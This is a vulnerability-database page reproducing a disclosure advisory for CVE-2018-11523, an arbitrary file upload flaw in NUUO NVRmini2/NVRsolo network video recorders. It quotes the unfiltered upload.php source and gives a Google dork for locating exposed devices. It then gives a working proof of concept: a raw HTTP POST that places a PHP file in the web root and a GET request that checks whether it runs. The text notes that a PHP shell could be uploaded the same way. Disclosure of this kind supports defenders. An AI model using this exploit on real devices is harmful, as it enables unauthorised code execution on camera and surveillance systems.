Vulners
Lucene search
NUUO NVRmini2 / NVRsolo - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | NUUO NVRmini2 / NVRsolo - Arbitrary File Upload Vulnerability | 29 May 201800:00 | – | zdt |
 | NUUO NVRmini 2 Arbitrary File Upload Vulnerability | 29 May 201800:00 | – | cnvd |
 | CVE-2018-11523 | 29 May 201807:00 | – | cve |
 | CVE-2018-11523 | 29 May 201807:00 | – | cvelist |
 | NUUO NVRmini2 / NVRsolo File Upload | 28 Aug 201800:00 | – | dsquare |
 | NUUO NVRmini2 NVRsolo - Arbitrary File Upload | 29 May 201800:00 | – | exploitpack |
 | CVE-2018-11523 | 29 May 201807:29 | – | nvd |
 | NUUO NVRmini 2 < 3.9.1 File Upload Vulnerability - Active Check | 30 May 201800:00 | – | openvas |
 | CVE-2018-11523 | 29 May 201807:29 | – | osv |
 | Default credentials | 29 May 201807:29 | – | prion |
10
# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523
==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================
Vulnerability Description
==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over
the world.
Vulnerable cgi: /upload.php
<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>
As the code above, no any filter, so we can upload a php shell directly to the web server.
==========================
POC EXP
==========================
1. Upload 'nuuonvr.php' to web root path:
POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162
----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
?php phpinfo();@unlink(__FILE__);?
----------969849961--
2. Check if the php file is uploaded successfully:
GET http://192.168.10.1/nuuonvr.php
If the page returns phpinfo info, target is vulnerable!Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 39.8
EPSS0.21263